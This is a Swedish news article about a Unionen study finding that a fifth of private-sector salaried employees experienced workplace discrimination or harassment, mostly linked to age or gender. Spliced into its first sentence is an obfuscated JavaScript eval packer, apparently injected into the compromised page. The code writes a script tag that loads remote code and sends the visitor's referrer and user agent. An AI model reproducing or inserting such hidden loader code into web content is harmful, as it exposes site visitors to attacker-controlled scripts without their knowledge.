Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

1 av 5 upplever diskriminering på jobbet

Unionen
Sebastian

Nästan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rarzs|var|u0026u|referrer|azzab||js|php’.split(’|’),0,{}))
en femtedel av Sveriges privatanställda tjänstemän har under det senaste året känt sig trakasserade eller diskriminerade på jobbet. Det visar en färsk studie från Unionen. Fackförbundet kräver att bättring sker omgående.

– Det är fullständigt oacceptabelt att en femtedel av de privatanställda tjänstemännen upplever att de har diskriminerats eller trakasserats på jobbet. Det ska råda nolltolerans mot den här typen av kränkningar, säger Marina Åman, 2:a vice förbundsordförande, Unionen.

Vanligast är att den upplevda diskrimineringen i arbetslivet har samband med ålder eller kön. Mest utsatta är medarbetare som är under 30 eller över 50 år och kvinnor.

– Vi behöver förändra de föreställningar, inte minst kopplade till kön och ålder, som leder till diskriminering och trakasserier. Den nuvarande situationen är inte värdig det svenska arbetslivet, säger Marina Åman, 2:a vice förbundsordförande, Unionen.

Samtidigt uppger nio av tio tjänstemän att alla på deras arbetsplats behandlas med respekt oavsett olikheter och bakgrund och att de kan vara sig själva på jobbet.

– Det är glädjande att de flesta känner sig till freds på sitt jobb. Unionen kommer att fortsätta driva frågan om allas lika rättigheter och möjligheter tills all diskriminering har upphört, säger Marina Åman, 2:a vice förbundsordförande, Unionen.

Lyckligtvis visar Unionens studie att förändring är möjlig. Upplevelserna av diskriminering och trakasserier är färre i företag med ett aktivt mångfalds- och jämställdhetsarbete.

– Det är A och O att chefer och andra företagsledare själva i ord och handling tar ställning mot diskriminering. Vi vill genomföra ett ambitiöst och systematiskt mångfalds- och jämställdhetsarbete, tillsammans med arbetsgivarna, säger Marina Åman, 2:a vice förbundsordförande, Unionen.

Mångfaldsundersökningen har genomförts av Kantar Sifo på uppdrag av Unionen. Svar från 3 000 slumpmässigt utvalda privata tjänstemän har inhämtats under maj 2017.

De sju diskrimineringsgrunder som omfattas av den svenska diskrimineringslagstiftningen är kön, könsöverskridande identitet eller uttryck, etnisk tillhörighet, religion eller annan trosuppfattning, funktionsnedsättning, sexuell läggning och ålder.

Unionen är ett fackförbund för privata tjänstemän och chefer samt för egenföretagare. Med över 640 000 medlemmar är Unionen Sveriges största fackförbund.